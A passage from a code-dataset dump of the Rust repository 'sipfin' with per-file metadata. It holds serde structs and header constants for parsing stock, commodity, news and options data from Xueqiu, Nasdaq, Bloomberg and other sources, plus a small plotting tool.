MSFT%2CAAPL%2CAMZN%2CGOOGL%2CBABA%2CFB%2CBRKA%2CJNJ%2CWMT%2CV%2CPG%2CJPM%2CTSM%2CUNH%2CMA%2CINTC%2CVZ%2CHD%2CT%2CMRK%2CKO%2CPFE%2CNVS%2CBAC%2CDIS%2CPEP%2CNFLX%2CXOM%2CCSCO%2CNVDA%2CTM%2CCMCSA%2CORCL%2CABT%2CADBE%2CCVX%2CCHL%2CLLY%2CSAP%2CNKE%2CTSLA%2CMDT%2CMCD%2CBMY%2CRDSA.AS%2CAZN%2CPYPL%2CTMO%2CPM%2CNEE\n// https://stock.xueqiu.com/v5/stock/realtime/quotec.json?\n// https://stock.xueqiu.com/v5/stock/history/trade.json?symbol=AAPL&count=20\n// https://stock.xueqiu.com/v5/stock/chart/minute.json?symbol=.DJI&period=1d\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct RealtimeQuotec {\n pub data: Vec<Quote>,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: ::serde_json::Value,\n}\n\n\nimpl RealtimeQuotec {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.iter() {\n // println!(\"{:#?}\", t);\n recs.push(Quote::to_record(t));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n pub symbol: String,\n pub current: f64,\n pub percent: f64,\n pub chg: f64,\n pub timestamp: i64,\n pub volume: i64,\n pub amount: f64,\n #[serde(rename = \"market_capital\")]\n pub market_capital: f64,\n #[serde(rename = \"float_market_capital\")]\n pub float_market_capital: ::serde_json::Value,\n #[serde(rename = \"turnover_rate\")]\n pub turnover_rate: f64,\n pub amplitude: f64,\n pub open: f64,\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub high: f64,\n pub low: f64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: Option<i64>,\n pub side: i64,\n #[serde(rename = \"is_trade\")]\n pub is_trade: bool,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: ::serde_json::Value,\n #[serde(rename = \"current_year_percent\")]\n pub current_year_percent: f64,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: ::serde_json::Value,\n #[serde(rename = \"type\")]\n pub type_field: i64,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\nimpl Quote {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n utils::lilmatcher_i64(self.trade_volume),\n self.volume.to_string(),\n self.open.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.last_close.to_string(),\n self.avg_price.to_string(),\n self.amount.to_string(),\n self.percent.to_string(),\n self.chg.to_string(),\n self.market_capital.to_string(),\n self.turnover_rate.to_string(),\n self.amplitude.to_string(),\n self.current_year_percent.to_string(),\n self.level.to_string(),\n self.trade_session.to_string(),\n );\n\n return rec;\n }\n}\n\npub const snowballQuoteHeader: [&'static str; 19] = [\n \"symbol\",\n \"timestamp\",\n \"current\",\n \"trade_volume\",\n \"volume\",\n \"open\",\n \"high\",\n \"low\",\n \"last_close\",\n \"avg_price\",\n \"amount\",\n \"percent\",\n \"chg\",\n \"market_capital\",\n \"turnover_rate\",\n \"amplitude\",\n \"current_year_percent\",\n \"level\",\n \"trade_session\",\n];\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TradeHistory {\n pub data: Trades,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: String,\n}\n\n\nimpl TradeHistory {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.items.iter() {\n println!(\"{:#?}\", t);\n recs.push(Trade::to_record(t));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trades {\n pub symbol: String,\n pub items: Vec<Trade>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trade {\n pub symbol: String,\n pub timestamp: i64,\n pub current: f64,\n pub chg: f64,\n pub percent: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: i64,\n pub side: i64,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: Option<String>,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: String,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\n\nimpl Trade {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n self.chg.to_string(),\n self.percent.to_string(),\n self.trade_volume.to_string(),\n self.side.to_string(),\n self.level.to_string(),\n utils::lilmatcher(self.trade_type.clone()),\n self.trade_unique_id.to_string(),\n );\n return rec;\n }\n}\n\npub const snowballTradeHeader: [&'static str; 10] = [\n \"symbol\",\n \"timestamp\",\n \"current\",\n \"chg\",\n \"percent\",\n \"trade_volume\",\n \"side\",\n \"level\",\n \"trade_type\",\n \"trade_unique_id\",\n];\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SnowballMinute {\n pub data: MinuteData,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MinuteData {\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub items: Vec<MinuteQuote>,\n #[serde(rename = \"items_size\")]\n pub items_size: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MinuteQuote {\n pub current: f64,\n pub volume: i64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n pub chg: f64,\n pub percent: f64,\n pub timestamp: i64,\n pub amount: f64,\n pub high: f64,\n pub low: f64,\n pub macd: ::serde_json::Value,\n pub kdj: ::serde_json::Value,\n pub ratio: ::serde_json::Value,\n pub capital: ::serde_json::Value,\n #[serde(rename = \"volume_compare\")]\n pub volume_compare: VolumeCompare,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct VolumeCompare {\n #[serde(rename = \"volume_sum\")]\n pub volume_sum: i64,\n #[serde(rename = \"volume_sum_last\")]\n pub volume_sum_last: i64,\n}\n" }, { "alpha_fraction": 0.5027567148208618, "alphanum_fraction": 0.5251550674438477, "avg_line_length": 28.612245559692383, "blob_id": "ed013ae7cab07f8f54ed1ac113158e6df991f8ff", "content_id": "9707ab88653a676f56fbd99763b0ea0af0e88885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2902, "license_type": "no_license", "max_line_length": 89, "num_lines": 98, "path": "/viz/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate plotters;\nuse chrono::DateTime;\nuse plotters::prelude::*;\nuse serde::Deserialize;\nuse std::env;\n#[derive(Debug, PartialOrd, PartialEq, Clone, Default, Deserialize)]\nstruct YfRow {\n symb: String,\n t: f32,\n o: f32,\n h: f32,\n l: f32,\n c: f32,\n v: u64,\n}\n\n#[derive(Debug, PartialOrd, PartialEq, Clone, Default, Deserialize)]\nstruct RtRow {\n symbol: String,\n t: String,\n x: f32,\n v: u64,\n}\n\nfn main() -> Result<(), Box<dyn std::error::Error>> {\n let args = env::args().collect::<Vec<String>>();\n if args.len() != 3 {\n panic!(\"arg 2: folder, arg 3: file_name. this looks in ../data/\");\n }\n let input_fold = args[1].clone();\n let input_fn = args[2].clone();\n //let data: Vec<YfRow> = get_data(&input_fold, &input_fn);\n let data: Vec<RtRow> = get_data(&input_fold, &input_fn);\n let xs = data.iter().map(|x| x.x).collect::<Vec<f32>>();\n let ts = data\n .iter()\n .map(|x| DateTime::parse_from_rfc3339(&x.t).unwrap().timestamp())\n .collect::<Vec<i64>>();\n //let closes = data.iter().map(|x| x.c).collect::<Vec<f32>>();\n //let min =\n let plot_fn = format!(\"../data/viz/{}.png\", input_fn);\n let root = BitMapBackend::new(&plot_fn, (640, 480)).into_drawing_area();\n root.fill(&WHITE)?;\n let mut chart = ChartBuilder::on(&root)\n .caption(input_fn, (\"sans-serif\", 50).into_font())\n .margin(5)\n .x_label_area_size(30)\n .y_label_area_size(30)\n .build_ranged(\n ts[0]..ts[data.len() - 1],\n //closes[0]..closes[closes.len() - 1],\n xs[0]..xs[xs.len() - 1],\n )?;\n\n let to_plot = data\n .iter()\n .map(|x| (DateTime::parse_from_rfc3339(&x.t).unwrap().timestamp(), x.x))\n .into_iter();\n\n chart.configure_mesh().draw()?;\n let series = LineSeries::new(to_plot, &RED);\n chart.draw_series(series);\n\n //chart\n // .draw_series(data.iter().map(|x| {\n // CandleStick::new(\n // //DateTime::parse_from_rfc3339(x.t).unwrap_or(panic!(\"fuck dates\")),\n // x.t, x.o, x.h, x.l, x.c, &GREEN, &RED, 15,\n // )\n // }))?\n // .label(\"y = x^2\")\n // .legend(|(x, y)| PathElement::new(vec![(x, y), (x + 20, y)], &RED));\n\n chart\n .configure_series_labels()\n .background_style(&WHITE.mix(0.8))\n .border_style(&BLACK)\n .draw()?;\n\n Ok(())\n}\n\npub fn get_data<'a, T: ?Sized>(folder: &str, file_name: &str) -> Vec<T>\nwhere\n for<'de> T: serde::Deserialize<'de> + 'a,\n{\n let file_name_fmtd = format!(\"../data/{}/{}\", folder, file_name);\n let mut rdr = csv::Reader::from_path(file_name_fmtd.clone()).expect(&file_name_fmtd);\n let iter = rdr.deserialize();\n let mut recs = vec![];\n for res in iter {\n if let Ok(r) = res {\n let rec: T = r;\n recs.push(rec);\n }\n }\n recs\n}\n" }, { "alpha_fraction": 0.48017334938049316, "alphanum_fraction": 0.49924159049987793, "avg_line_length": 21.512195587158203, "blob_id": "6a0e9c51282ada46974586add44ff88afd13e58f", "content_id": "8862ff725d6527dde8be87b88e17cdf54aa7c3ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 4615, "license_type": "no_license", "max_line_length": 163, "num_lines": 205, "path": "/finox/src/headers.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub const BLOOMBERG_CURRENCY_SYMBOLS: [&'static str; 40] = [\n \"USD\", \"EUR\", \"XAU\", \"XAG\", \"XPT\", \"XPD\", \"JPY\", \"GBP\", \"AUD\", \"CAD\", \"CHF\", \"KRW\", \"MXN\",\n \"BRL\", \"CLP\", \"COP\", \"PEN\", \"CRC\", \"ARS\", \"SEK\", \"DKK\", \"NOK\", \"CZK\", \"SKK\", \"PLN\", \"HUF\",\n \"RUB\", \"TRY\", \"ILS\", \"KES\", \"ZAR\", \"MAD\", \"NZD\", \"PHP\", \"SGD\", \"IDR\", \"CNY\", \"INR\", \"MYR\",\n \"THB\",\n];\n// USD,EUR,XAU,XAG,XPT,XPD,JPY,GBP,AUD,CAD,CHF,KRW,MXN,BRL,CLP,COP,PEN,CRC,ARS,SEK,DKK,NOK,CZK,SKK,PLN,HUF,RUB,TRY,ILS,KES,ZAR,MAD,NZD,PHP,SGD,IDR,CNY,INR,MYR,THB,\npub const BLOOMBERG_NEWS_SYMBOLS: [&'static str; 5] = [\n \"GOVERNMENT_BOND\",\n \"COMMODITY\",\n \"COMMON_STOCK\",\n \"CURRENCY\",\n \"BLOOMBERG_BARCLAYS_INDEX\",\n];\n\npub const BLOOMBERG_COMMODITIES_SYMBOLS: [&'static str; 37] = [\n \"CO1\", \"CL1\", \"XB1\", \"NG1\", \"HO1\", \"GC1\", \"SI1\", \"HG1\", \"C%201\", \"W%201\", \"CC1\", \"CT1\", \"LC1\",\n \"QS1\", \"JX1\", \"MO1\", \"JG1\", \"LMCADS03\", \"LMAHDS03\", \"LMZSDS03\", \"LMSNDS03\", \"O%201\", \"RR1\",\n \"S%201\", \"SM1\", \"BO1\", \"RS1\", \"KC1\", \"SB1\", \"JO1\", \"CT1\", \"OL1\", \"LB1\", \"JN1\", \"DL1\", \"FC1\",\n \"LH1\",\n];\n\npub const BLOOMBERG_STOCK_HEADER: [&'static str; 15] = [\n \"id\",\n \"short_name\",\n \"market_cap\",\n \"co_phone\",\n \"last_update\",\n \"average_volume30_day\",\n \"price\",\n \"open_price\",\n \"high_price\",\n \"low_price\",\n \"low_price52_week\",\n \"high_price52_week\",\n \"number_of_employees\",\n \"price_earnings_ratio\",\n \"shares_outstanding\",\n];\n\npub const YF_META_HEADER: [&'static str; 9] = [\n \"symbol\",\n \"exchange\",\n \"instrument\",\n \"currency\",\n \"first_trade_date\",\n \"reg_mkt_time\",\n \"gmtoffset\",\n \"tz\",\n \"exchange_tz\",\n];\n\npub const YF_CURRENCIES: [&'static str; 23] = [\n \"USD\", \"EUR\", \"JPY\", \"GBP\", \"AUD\", \"CAD\", \"BTC\", \"ETH\", \"NZD\", \"SEK\", \"CHF\", \"HUF\", \"CNY\",\n \"HKD\", \"SGD\", \"INR\", \"MXN\", \"PHP\", \"IDR\", \"THB\", \"MYR\", \"ZAR\", \"RUB\",\n];\n\npub const YF_COMMODITIES: [&'static str; 23] = [\n \"ES\", \"YM\", \"NQ\", \"RTY\", \"ZB\", \"ZN\", \"ZF\", \"ZT\", \"GC\", \"SI\", \"HG\", \"PA\", \"CL\", \"HO\", \"NG\",\n \"RB\", \"BZ\", \"C\", \"KW\", \"SM\", \"BO\", \"S\", \"CT\",\n];\n\npub const REUTERS_COUNTRIES: [&'static str; 17] = [\n \"cn\", \"de\", \"in\", \"jp\", \"uk\", \"us\", \"af\", \"ar\", \"ara\", \"br\", \"ca\", \"es\", \"fr\", \"it\", \"lta\",\n \"mx\", \"ru\",\n];\n\npub const YF_STOCKS: [&'static str; 7] = [\"symbol\", \"t\", \"o\", \"h\", \"l\", \"c\", \"v\"];\n\npub const SA_HEADER: [&'static str; 8] = [\n \"id\",\n \"author_id\",\n \"publish_on\",\n \"title\",\n \"slug\",\n \"ncomments\",\n \"author_name\",\n \"path\",\n];\n\npub const REUTERS_HEADER: [&'static str; 7] = [\n \"id\",\n \"updated\",\n \"headline\",\n \"reason\",\n \"path\",\n \"channel_name\",\n \"channel_path\",\n];\n\npub const WSJ_HEADER: [&'static str; 9] = [\n \"id\",\n \"created\",\n \"name\",\n \"description\",\n \"duration\",\n \"column\",\n \"doctype\",\n \"email\",\n \"thumbnail\",\n];\n\npub const NYT_FEED_HEADER: [&'static str; 16] = [\n \"slug\",\n \"first_pub\",\n \"section\",\n \"subsec\",\n \"by\",\n \"title\",\n \"subheadline\",\n \"abs\",\n \"matrial_type\",\n //\"geo_tag\",\n //\"org_tag\",\n //\"des_tag\",\n //\"per_tag\",\n \"source\",\n \"published\",\n \"created\",\n \"updated\",\n \"url\",\n //\"thumbnail\",\n \"kicker\",\n \"item_type\",\n];\n\npub const NYT_ARCHIVE_HEADER: [&'static str; 12] = [\n \"id\", \"wc\", \"by\", \"pub\", \"doctype\", \"page\", \"headline\", \"kicker\", \"snippet\", \"abstract\", \"url\",\n \"source\",\n];\n\npub const SEC13F_HEADER: [&'static str; 11] = [\n \"nameOfIssuer\",\n \"titleOfClass\",\n \"cusip\",\n \"value\",\n \"sshPrnamt\",\n \"sshPrnamtType\",\n \"investmentDiscretion\",\n \"otherManager\",\n \"Sole\",\n \"Shared\",\n \"None\",\n];\n\npub const GS_HEADER: [&'static str; 6] = [\n \"node_id\",\n \"date\",\n \"title\",\n \"description\",\n \"has_video\",\n \"has_audio\",\n];\n\npub const GUARDIAN_HEADER: [&'static str; 9] = [\n \"id\",\n \"type\",\n \"section_id\",\n \"section_name\",\n \"t\",\n \"title\",\n \"url\",\n \"is_hosted\",\n \"pillar_id\",\n];\n\npub const JPXNEWS_HEADER: [&'static str; 10] = [\n \"kind\",\n \"category\",\n \"corporation\",\n \"ir_category\",\n \"product_category\",\n \"title\",\n \"url\",\n \"year\",\n \"month\",\n \"day\",\n];\n\npub const CME_QUOTE_HEADER: [&'static str; 22] = [\n \"t\",\n \"last\",\n \"change\",\n \"prior_settle\",\n \"open\",\n \"close\",\n \"high\",\n \"low\",\n \"high_limit\",\n \"low_limit\",\n \"volume\",\n \"md_key\",\n \"quote_code\",\n \"expiration_month\",\n \"expiration_date\",\n \"product_name\",\n \"product_code\",\n \"uri\",\n \"product_id\",\n \"exchange_code\",\n \"option_uri\",\n \"has_option\",\n];\n\npub const MOODYS_HEADER: [&'static str; 4] = [\"title\", \"source\", \"t\", \"synopsis\"];\n" }, { "alpha_fraction": 0.48202842473983765, "alphanum_fraction": 0.48620784282684326, "avg_line_length": 27.94354820251465, "blob_id": "7b664255b97a1dc212d89b8a5f797195dceb1d77", "content_id": "6d20ec51935818e62ef9f73926e13d5ddb0eae22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3589, "license_type": "no_license", "max_line_length": 95, "num_lines": 124, "path": "/finox/src/nasdaq/realtime.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\nuse chrono::{DateTime, FixedOffset};\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct RealtimeRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl RealtimeRoot {\n pub fn to_new_recs(\n &self,\n t: DateTime<FixedOffset>,\n ) -> (Option<Vec<Vec<String>>>, DateTime<FixedOffset>) {\n return self.data.to_new_recs(t);\n }\n}\n\nimpl crate::HasRecs for RealtimeRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.data\n .to_recs()\n .into_iter()\n .flatten()\n .collect::<Vec<_>>()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub symbol: String,\n pub total_records: i64,\n pub offset: i64,\n pub limit: i64,\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\nimpl Data {\n pub fn to_new_recs(\n &self,\n t: DateTime<FixedOffset>,\n ) -> (Option<Vec<Vec<String>>>, DateTime<FixedOffset>) {\n let mut recs = vec![];\n let mut newest = t;\n for r in self.rows.iter() {\n let tup = r.to_new_rec(&self.symbol, t);\n match tup {\n Some((v, new_t)) => {\n if new_t > newest {\n newest = new_t;\n }\n recs.push(v);\n }\n None => break,\n }\n }\n if newest == t {\n return (None, t);\n }\n //println!(\"new t: {:?}, old t: {:?}\", newest, t);\n return (Some(recs), newest);\n }\n\n pub fn to_recs(&self) -> Vec<Option<Vec<String>>> {\n self.rows\n .iter()\n .map(|x| x.to_rec(&self.symbol))\n .collect::<Vec<Option<Vec<String>>>>()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub nls_time: String,\n pub nls_price: String,\n pub nls_share_volume: String,\n}\n\nimpl Row {\n pub fn to_new_rec(\n &self,\n symbol: &str,\n last_new: DateTime<FixedOffset>,\n ) -> Option<(Vec<String>, DateTime<FixedOffset>)> {\n /* if the current rec has a time newer than the previous newest time\n * then it must be new data\n */\n if let Ok(t) = crate::nls_to_dt(&self.nls_time) {\n if last_new <= t {\n return Some((\n vec![\n symbol.to_string(),\n t.to_rfc3339(),\n self.nls_price.to_string().replace(\"$ \", \"\"),\n self.nls_share_volume.to_string().replace(\",\", \"\"),\n ],\n t,\n ));\n } else {\n return None;\n }\n // prob change, sending true because failed to parse\n }\n return None;\n }\n pub fn to_rec(&self, symbol: &str) -> Option<Vec<String>> {\n if let Ok(t) = crate::nls_to_dt(&self.nls_time) {\n return Some(vec![\n symbol.to_string(),\n t.to_rfc3339(),\n self.nls_price.to_string().replace(\"$ \", \"\"),\n self.nls_share_volume.to_string().replace(\",\", \"\"),\n ]);\n }\n return None;\n }\n}\n\npub const NDAQ_REALTIME_HEADER: [&'static str; 4] = [\"symbol\", \"t\", \"x\", \"v\"];\n" }, { "alpha_fraction": 0.605393648147583, "alphanum_fraction": 0.6091134548187256, "avg_line_length": 29.433961868286133, "blob_id": "113506aceef9a333794142b13b8911fa690c3916", "content_id": "f1a7f2a94b9cd144176a69df4fc5e26dc424c4f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3226, "license_type": "no_license", "max_line_length": 97, "num_lines": 106, "path": "/finox/src/nasdaq/info.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n// https://api.nasdaq.com/api/quote/AAPL/info?assetclass=stocks\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InfoRoot {\n pub data: InfoData,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRec for InfoRoot {\n fn to_rec(&self) -> Vec<String> {\n self.data.to_rec()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InfoData {\n pub symbol: String,\n pub company_name: String,\n pub stock_type: ::serde_json::Value,\n pub exchange: String,\n pub is_nasdaq_listed: bool,\n pub is_nasdaq100: bool,\n pub is_held: bool,\n pub primary_data: PrimaryData,\n pub secondary_data: ::serde_json::Value,\n pub key_stats: ::serde_json::Value,\n pub market_status: String,\n pub asset_class: String,\n}\n\nimpl InfoData {\n pub fn to_rec(&self) -> Vec<String> {\n let mut rec: Vec<String> = vec![\n self.symbol.to_string(),\n self.company_name.to_string(),\n self.stock_type.to_string(),\n self.exchange.to_string(),\n self.is_nasdaq_listed.to_string(),\n self.is_nasdaq100.to_string(),\n self.is_held.to_string(),\n ];\n rec.append(&mut PrimaryData::to_rec(&self.primary_data));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PrimaryData {\n pub last_sale_price: String,\n pub net_change: String,\n pub percentage_change: String,\n pub delta_indicator: String,\n pub last_trade_timestamp: String,\n pub is_real_time: bool,\n}\n\nimpl PrimaryData {\n pub fn to_rec(&self) -> Vec<String> {\n // let ts = self.last_trade_timestamp.split(\"OF \").collect::<Vec<&str>>();\n // println!(\"{:#?}\", ts);\n return vec![\n self.last_trade_timestamp.to_string(), //.split_at(mid: usize),\n // ts[1].to_string(),\n self.last_sale_price.to_string(),\n self.net_change.to_string(),\n self.percentage_change.to_string(),\n self.is_real_time.to_string(),\n self.delta_indicator.to_string(),\n ];\n }\n}\n\n// commodities diff than stocks, serializing to Value\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct KeyStats {\n// #[serde(rename = \"Volume\")]\n// pub volume: gen::LabelValue,\n// #[serde(rename = \"PreviousClose\")]\n// pub previous_close: gen::LabelValue,\n// #[serde(rename = \"OpenPrice\")]\n// pub open_price: gen::LabelValue,\n// #[serde(rename = \"MarketCap\")]\n// pub market_cap: gen::LabelValue,\n//}\n\npub const NDAQ_QUOTE_HEADER: [&'static str; 13] = [\n \"symbol\",\n \"company_name\",\n \"stock_type\",\n \"exchange\",\n \"is_nasdaq_listed\",\n \"is_nasdaq100\",\n \"is_held\",\n \"last_trade_timestamp\",\n \"last_sale_price\",\n \"net_change\",\n \"percentage_change\",\n \"is_real_time\",\n \"delta_indicator\",\n];\n" }, { "alpha_fraction": 0.6604278087615967, "alphanum_fraction": 0.6604278087615967, "avg_line_length": 31.807018280029297, "blob_id": "7b2aebac0903fba4534b810e904c73c4c65c6607", "content_id": "25038aea77d9dffd0c2d73996ccd1df28a8e1e3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1870, "license_type": "no_license", "max_line_length": 95, "num_lines": 57, "path": "/finox/src/misc/fix.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n #[serde(rename = \"Header\")]\n pub header: Header,\n #[serde(rename = \"Body\")]\n pub body: Body,\n #[serde(rename = \"Trailer\")]\n pub trailer: Trailer,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Header {\n #[serde(rename = \"BeginString\")]\n pub begin_string: String,\n #[serde(rename = \"MsgType\")]\n pub msg_type: String,\n #[serde(rename = \"MsgSeqNum\")]\n pub msg_seq_num: String,\n #[serde(rename = \"SenderCompID\")]\n pub sender_comp_id: String,\n #[serde(rename = \"TargetCompID\")]\n pub target_comp_id: String,\n #[serde(rename = \"SendingTime\")]\n pub sending_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Body {\n #[serde(rename = \"SecurityIDSource\")]\n pub security_idsource: String,\n #[serde(rename = \"SecurityID\")]\n pub security_id: String,\n #[serde(rename = \"MDReqID\")]\n pub mdreq_id: String,\n #[serde(rename = \"NoMDEntries\")]\n pub no_mdentries: Vec<NoMdentry>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NoMdentry {\n #[serde(rename = \"MDEntryType\")]\n pub mdentry_type: String,\n #[serde(rename = \"MDEntryPx\")]\n pub mdentry_px: String,\n #[serde(rename = \"MDEntrySize\")]\n pub mdentry_size: String,\n #[serde(rename = \"MDEntryTime\")]\n pub mdentry_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trailer {}\n" }, { "alpha_fraction": 0.7164179086685181, "alphanum_fraction": 0.7164179086685181, "avg_line_length": 13.88888931274414, "blob_id": "66283e8a9b71e2ecf1308ca420630ada1335c4ae", "content_id": "70233839a52e852a1e859c2d47e0442ecbee7736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 134, "license_type": "no_license", "max_line_length": 20, "num_lines": 9, "path": "/finox/src/news.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod gs;\n//pub mod bloomberg;\npub mod moodys;\npub mod guardian;\npub mod sa;\npub mod jpxnews;\npub mod tr;\npub mod nyt;\npub mod wsj;\n" }, { "alpha_fraction": 0.5700498223304749, "alphanum_fraction": 0.5734744668006897, "avg_line_length": 26.930435180664062, "blob_id": "d6b32d2005b98b21504c3cc21ab653e1ddd6b319", "content_id": "eb51ad949f4e218db63a4e56478ba5266b1742e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3212, "license_type": "no_license", "max_line_length": 95, "num_lines": 115, "path": "/finox/src/nasdaq/option_chain.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n// use crate::nasdaq::gen::HasRecs;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionChainRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for OptionChainRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs = vec![];\n for row in self.data.option_chain_list.rows.iter() {\n recs.append(&mut row.to_recs())\n }\n return recs;\n }\n //pub fn get_id(&self) -> String {\n // return self.data.option_chain_list.rows[0]\n // .call\n // .symbol\n // .to_string()\n // .split_whitespace()\n // .next()\n // .expect(\"wtf option ticker\")\n // .to_string();\n //}\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub total_record: i64,\n pub last_trade: String,\n pub option_chain_list: OptionChainList,\n pub month_filter: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = 